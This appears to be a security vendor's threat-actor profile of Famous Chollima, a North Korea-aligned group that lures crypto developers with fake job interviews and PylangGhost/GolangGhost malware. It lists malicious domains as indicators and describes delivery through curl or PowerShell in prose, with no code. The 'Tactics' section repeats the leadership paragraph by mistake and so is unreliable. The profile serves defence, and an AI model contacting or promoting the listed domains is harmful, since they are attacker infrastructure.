Detect, Respond, Protect
See how the global Huntress SOC can augment your team
with 24/7 coverage and unmatched human expertise.
Start your free trial today.
Threat Actor Profile
Famous Chollima
Famous Chollima is a North Korea-aligned cyber threat actor, emerging mid-2024, and linked to both financial theft and state-sponsored intelligence operations. Known for targeting cryptocurrency and blockchain sectors, this group employs sophisticated social engineering tactics and custom malware to infiltrate organizations globally.
Threat Actor Profile
Famous Chollima
Country of Origin
Famous Chollima originates from North Korea (DPRK). This alignment is based on its operational tactics, motivations, and ties to the broader DPRK state-sponsored cyber framework.
Members
Details on individual members are scarce. The group has utilized numerous identities and aliases to mask its activities, often creating fake profiles and resumes to infiltrate organizations under a pretense.
Leadership
The specific leadership of Famous Chollima remains unknown. However, there are indications that the group operates under a coordinated command structure, likely linked to North Korea's broader cyber operations apparatus.
Famous Chollima TTPs
Tactics
The specific leadership of Famous Chollima remains unknown. However, there are indications that the group operates under a coordinated command structure, likely linked to North Korea's broader cyber operations apparatus.
Techniques
Famous Chollima’s techniques include: Social engineering, using fake job recruitment sites and counterfeit interviews. Deployment of custom malware like PylangGhost (Python-based, Windows) and GolangGhost (Go-based, macOS).Use of doctored identities to infiltrate companies as remote workers.
Procedures
Common methods include: Malware delivery via fake interview steps, driver installations, and browser theft extensions. Exploiting victims via PowerShell or curl commands to initiate malicious downloads. Establishing long-term persistence for data exfiltration and espionage.
Want to Shut Down Threats Before They Start?
Indicators of Compromise (IoCs)
Indicators linked to Famous Chollima include:
Malicious domains such as "api.quickcamfix.online" and "api.drive-release.cloud."
File hashes related to PylangGhost/GolangGhost artifacts.
Malware deployment instructions disguised as routine job application steps.
Key Victims
The group primarily targets cryptocurrency and blockchain developers, engineers, and organizations. Campaigns have focused geographically on India and globally on macOS and Windows users.
Notable Cyberattacks
Recent campaigns include the May 2025 discovery of PylangGhost targeting Windows users, marking an evolution from their earlier macOS focus. Social engineering tactics evolved simultaneously, enhancing their success rate.
Law Enforcement & Arrests
No arrests have been reported related to Famous Chollima. Their operational reach and state sponsorship make direct action challenging for global law enforcement.
How to Defend Against Famous Chollima
1
Training employees with security awareness training to identify phishing and social engineering tactics.
2
Monitoring for malicious IOCs like domains and malware signatures.
3
Endpoint Detection and Response (EDR): Leverage tools to identify malware signatures and anomalous network behavior.
References
